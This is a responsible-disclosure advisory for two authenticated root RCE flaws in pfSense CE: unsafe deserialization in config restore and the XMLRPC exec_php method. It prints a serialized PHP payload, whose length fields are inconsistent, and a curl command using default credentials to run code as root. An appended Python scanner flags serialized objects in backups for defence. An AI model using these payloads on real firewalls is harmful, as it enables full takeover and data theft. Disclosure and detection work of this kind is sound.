Advisory: Authenticated Remote Code Execution in pfSense CE
CVEs: CVE-2025-69690, CVE-2025-69691
Researcher: Nelson Adhepeau ([email protected])
Date: February 2026

== RESPONSIBLE DISCLOSURE NOTICE ==

This advisory is published in accordance with responsible disclosure
practices. The vendor was notified on December 2, 2025, acknowledged the
reports, and indicated no patches would be issued. Publication follows
standard 90-day disclosure guidelines.

-------------------------------------------------------------

== OVERVIEW ==

Two independent authenticated Remote Code Execution vulnerabilities were
discovered in Netgate pfSense Community Edition. Both were reproduced on
clean installations. Vendor was contacted and acknowledged the reports but
classified both as expected behavior for authenticated administrators.

-------------------------------------------------------------

== CVE-2025-69690 ==

Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2)

CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-502: Deserialization of Untrusted Data
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

The pfSense configuration restore mechanism invokes unserialize() on
user-controlled data without class whitelisting, input validation, or
sandboxing. A crafted backup file containing a malicious serialized PHP
object can inject arbitrary commands via the post_reboot_commands property,
executed through mwexec() with full root privileges.

-- Affected Component --

backup/restore mechanism, config.php, pfsense_module_installer class,
unserialize() handling

-- Attack Vector --

1. Attacker authenticates as administrator
2. Uploads malicious configuration backup file
3. Triggers restore operation
4. pfSense unserializes attacker-controlled data
5. Commands execute as root via mwexec()

-- PoC Payload --

O:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";}}

-- Impact --

- Arbitrary command execution as root
- Persistent compromise
- Complete firewall takeover
- Credential and configuration exfiltration

-- Vendor Response --

Netgate acknowledged the report. Classified as "authenticated
administrative abuse". No patch issued. Vendor does not assign CVEs
directly.

-------------------------------------------------------------

== CVE-2025-69691 ==

Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0)

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-284: Improper Access Control
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

pfSense CE 2.8.0 exposes an XMLRPC API method pfsense.exec_php that
executes arbitrary PHP code as root without validation, sandboxing, or
restrictions. The endpoint is enabled by default, accessible over HTTPS via
Basic Authentication, and executes supplied code immediately with full
system privileges. Default credentials (admin:pfsense) are widely deployed,
significantly lowering the exploitation barrier.

-- Affected Component --

xmlrpc.php, pfsense.exec_php method, XMLRPC API handler, BasicAuth
authentication layer

-- Attack Vector --

curl -k -u admin:pfsense \
  -d '<methodCall>
  <methodName>pfsense.exec_php</methodName>
  <params><param><value><string>
  system("id");
  </string></value></param></params>
  </methodCall>' \
  https://<target>/xmlrpc.php

-- Impact --

- Full remote root compromise
- Arbitrary file read/write
- Backdoor deployment
- Firewall rule manipulation
- Extraction of secrets and configurations
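
A pre-restore check for the deserialization issue (CVE-2025-69690), added here as an illustration and not part of the advisory or of pfSense: it scans a backup for PHP serialized-object headers, raw or base64-encoded, and refuses the restore unless every class is allowlisted. The element name hypothetical_blob, the sample backups and the base64 handling are assumptions, and the command string is a placeholder.

```python
import base64
import binascii
import re
from typing import NamedTuple

# PHP serialize() object headers: O:<len>:"<class>":<props>:{ and the
# Serializable form C:<len>:"<class>":<bytes>:{ . The declared length is
# matched but not trusted, so a malformed header is still reported.
_OBJ = re.compile(r'(?<![A-Za-z0-9_])([OC]):\d+:"([A-Za-z_\\][\w\\]*)":\d+:\{')
_B64 = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')

class Finding(NamedTuple):
    kind: str        # "O" or "C"
    class_name: str
    encoding: str    # "raw" or "base64"

def _scan(text, encoding):
    return [Finding(m.group(1), m.group(2), encoding) for m in _OBJ.finditer(text)]

def find_serialized_objects(text):
    """Return object headers found in the text and in decodable base64 runs."""
    findings = _scan(text, "raw")
    for run in _B64.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        findings += _scan(decoded, "base64")
    return findings

def restore_allowed(text, allowed_classes=frozenset()):
    """Permit a restore only if every object class is allowlisted.
    The empty default mirrors PHP's unserialize($s, ['allowed_classes' => false])."""
    return all(f.class_name in allowed_classes for f in find_serialized_objects(text))

# Constructed samples: the object header is the one quoted in the advisory,
# the element name is hypothetical and the command is a placeholder.
_PAYLOAD = ('O:23:"pfsense_module_installer":1:{s:17:"*post_reboot_commands";'
            'a:1:{i:0;s:11:"PLACEHOLDER";}}')
_WRAP = '<pfsense><hypothetical_blob>%s</hypothetical_blob></pfsense>'
SUSPECT_BACKUP = _WRAP % _PAYLOAD
ENCODED_BACKUP = _WRAP % base64.b64encode(_PAYLOAD.encode()).decode()
CLEAN_BACKUP = _WRAP % 'a:2:{s:4:"host";s:7:"fw.test";s:3:"ver";i:2;}'

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_BACKUP), ("encoded", ENCODED_BACKUP),
                        ("clean", CLEAN_BACKUP)):
        print(label, restore_allowed(blob), find_serialized_objects(blob))
```

A scan like this is an audit aid before a restore; the fix for the root cause is restricting classes in the unserialize() call itself.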

